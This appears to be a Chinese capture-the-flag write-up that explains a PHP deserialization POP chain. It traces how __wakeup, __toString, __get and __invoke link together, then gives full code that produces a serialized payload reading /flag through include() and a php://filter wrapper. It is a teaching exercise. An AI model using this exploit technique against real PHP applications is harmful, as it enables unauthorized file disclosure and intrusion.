第一步:看到 include($value); 作为链尾,则要触发 append($value) -->>__invoke(),看到$function()。
__invoke():对象以函数形式被调用时触发
第二步:$function() ,则要触发 __get($key),看到 $this->string->page
__get():对不存在、不可访问的变量进行赋值就会自动调用
第三步:$this->string->page(重点) ,则要触发 __toString(),看到 preg_match
使 $this->string 为 Make_a_Change 的一个对象,则这个对象的类里面没有page这个变量,则会触发__get()。
__toString():对象被当成字符串时被调用
echo,print,die,preg_match,strtolower,==
第四步:preg_match,则要触发 __wakeup(),而原文中有 unserialize(),不用管。
<?php
class Road_is_Long{
public $page;//4 Road_is_Long
public $string;//3 Make_a_Change
public function __construct($file='index.php'){
$this->page = $file;
}
public function __toString(){
return $this->string->page;
}
public function __wakeup(){
if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {
echo "You can Not Enter 2022";
$this->page = "index.php";
}
}
}
class Try_Work_Hard{
protected $var="php://filter/convert.base64-encode/resource=/flag";//1 shell
public function append($value){
include($value);
}
public function __invoke(){
$this->append($this->var);
}
}
class Make_a_Change{
public $effort;//2 Try_Work_Hard
public function __construct(){
$this->effort = array();
}
public function __get($key){
$function = $this->effort;
return $function();
}
}
$a=new Try_Work_Hard();
$b=new Make_a_Change();
$b->effort=$a;
$c=new Road_is_Long();
$c->string=$b;
$d=new Road_is_Long();
$d->page=$c;
echo urlencode(serialize($d));
?>要点:
1.在弄pop链时,只在变量上表明步骤。通过标注来写过程。
2. 有特殊的成员变量时,最后要urlencode()。
3.对于第三步和第四步要分开赋值。
$c=new Road_is_Long();
$c->string=$b;
$d=new Road_is_Long();
$d->page=$c;
1420
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
